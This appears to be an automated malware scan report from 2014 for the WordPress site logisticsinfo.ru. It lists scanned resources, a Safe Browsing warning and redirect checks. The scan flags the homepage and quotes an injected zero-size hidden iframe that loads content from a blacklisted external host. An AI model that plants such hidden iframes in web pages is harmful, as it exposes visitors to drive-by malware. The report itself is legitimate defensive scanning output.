Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=logisticsinfo.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.logisticsinfo.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 May 2014 23:27:15 GMT Location: http://logisticsinfo.ru/ Server: nginx Content-Type: text/html; charset=UTF-8 Set-Cookie: Apache=78.158.11.226.1399850835031530; path=/; expires=Mon, 11-May-15 23:27:15 GMT X-Pingback: http://logisticsinfo.ru/xmlrpc.php X-Powered-By: PHP/5.3.18 X-Powered-By: PleskLin | clean |
http://logisticsinfo.ru/ | 200 OK Content-Length: 55427 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nioxox.nodoclender.com <iframe src="http://nioxox.nodoclender.com:13014/poll/novell.php?rssfeed=41" height="0" width="0" style='visibility: hidden'></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Log ...[62152 bytes skipped]... Malicious iFrame found. The same iFrame was found in 16 websites. size: 0x0 style: hidden src: http://nioxox.nodoclender.com:13014/poll/novell.php?rssfeed=41 This URL is marked by Google as suspicious <iframe src="http://nioxox.nodoclender.com:13014/poll/novell.php?rssfeed=41" height="0" width="0" style='visibility: hidden'> | ||
http://logisticsinfo.ru/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/plugins/scroll-to-top/js/stt.js?ver=1.0 | 200 OK Content-Length: 569 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.3 | 200 OK Content-Length: 931 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/themes/BlackenMagazine/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/themes/BlackenMagazine/js/jquery.dropdownPlain.js | 200 OK Content-Length: 374 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/themes/BlackenMagazine/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 15853 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 15158 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 6933 Content-Type: text/javascript | clean |
http://logisticsinfo.ru/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.3.32.js?ver=1.3.32 | 200 OK Content-Length: 26029 Content-Type: text/javascript | clean |
http://www.logisticsinfo.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 11 May 2014 23:27:20 GMT Location: http://logisticsinfo.ru/ Server: nginx Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 | clean |
http://logisticsinfo.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 11 May 2014 23:27:20 GMT Location: http://logisticsinfo.ru/ Server: nginx Content-Length: 274 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: logisticsinfo.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 May 2014 23:27:17 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Set-Cookie: Apache=78.158.11.226.1399850835358199; path=/; expires=Mon, 11-May-15 23:27:15 GMT
X-Pingback: http://logisticsinfo.ru/xmlrpc.php
X-Powered-By: PHP/5.3.18
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: logisticsinfo.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 May 2014 23:27:17 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Set-Cookie: Apache=78.158.11.226.1399850835358199; path=/; expires=Mon, 11-May-15 23:27:15 GMT
X-Pingback: http://logisticsinfo.ru/xmlrpc.php
X-Powered-By: PHP/5.3.18
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: logisticsinfo.ru
Referer: http://www.google.com/search?q=logisticsinfo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: logisticsinfo.ru
Referer: http://www.google.com/search?q=logisticsinfo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.